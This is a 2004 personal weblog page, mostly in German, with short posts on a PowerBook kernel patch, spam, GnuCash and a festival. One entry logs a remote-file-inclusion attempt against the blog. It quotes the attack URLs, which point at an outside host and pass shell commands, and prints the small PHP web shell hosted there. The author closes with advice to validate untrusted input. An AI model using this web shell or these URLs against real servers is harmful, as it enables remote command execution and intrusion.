Thursday, 17. June 2004 Week 25

PowerBook Buttons

Nachdem ich diese Artikel gelesen hatte, kam ich plötzlich auf die Idee die bisher nicht funktionerenden Spezialbuttons meines PowerBooks zum laufen zu kriegen.

Dies stellte sich unerwarteterweise als gar nicht so schwer heraus, und nun gibts hier einen Patch für den 2.6.3 Kernel :-)

*kernelhacking*

Saturday, 12. June 2004 Week 24

Alle 20 Minuten Spam

Wie ich vorhin gerade bemerkt habe, habe ich in den letzten 12 Tagen 800 Spam-Mails erhalten. Glücklicherweise hat mein Spam-Filter 780 davon erkannt :-)

phpPatterns()

Auf phpPatterns() findet man viele Artikel zu Patterns und Objektorientierter Programmierung.

Wer mit Mozilla unterwegs ist, kann dort auch den XUL Viewer ausprobieren.

Wednesday, 9. June 2004 Week 24

Money, Money, Money

Seit ein paar Monaten, benutze ich GnuCash um mein "Vermögen" zu verwalten.

GnuCash wurde in erster Linie für Privatanwender und KMUs entwickelt und bringt entsprechende Features mit:

  • Doppelte Buchhaltung mit allem was dazugehört: Journal, Tansaktionen etc.
  • OFX Import (was leider in der Schweiz von keiner Bank angeboten wird)
  • HBCI-Untersützung (welche bisher vor allem in Deutschland angeboten wird)
  • QIF-Unterstützung
  • Generierung von Berichten
  • Aktienkurse aus dem Internet
  • Devisenkurse aus dem Internet
  • Handling von Aktien- und Fonds Portfolios
  • Kunden- und Lieferanten Verwaltung
  • Rechnungsverwaltung
  • Steuerverwaltung
  • Fristenverwaltung
Sunday, 16. May 2004 Week 20

XSS

http://waterwave.ch/weblog/detail.php?label=http://cliente.escelsanet.com.br/metallz/cmd.jpg?&cmd=ls%20/;uname%20-a;w
http://waterwave.ch/weblog/index.php?cat=http://cliente.escelsanet.com.br/metallz/cmd.jpg?&cmd=ls%20/;uname%20-a;w

Na, billige XSS-Attacke falsch angewendet.

In http://cliente.escelsanet.com.br/metallz/cmd.jpg steht übrigens dieser PHP-Code.

</center><font size="2"><pre>-
<?
  if (isset($chdir)) @chdir($chdir);
  ob_start();
  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>

Merke: Immer alle nicht vertrauenswürdigen Input-Daten (e.g. alle per POST, GET, COOKIE übermittelten Daten) kontrollieren. Sehr oft werden hierzu Character type functions eingesetzt.

Balélec 2004

Le vendredi j'étais au Balélec et c'était vachement cool. 30 groupes sur 7 scènes pour 20 Francs, cela on ne trouve pas ailleurs.

On se voit l'année prochaine, au 25-ième Balélec!

Wednesday, 12. May 2004 Week 20

v2.04b

Neue Features:
  • Kommentarvorschau
  • On-the-fly Sprachwechsel der Navigationselemente (Deutsch/Französisch)
Saturday, 8. May 2004 Week 19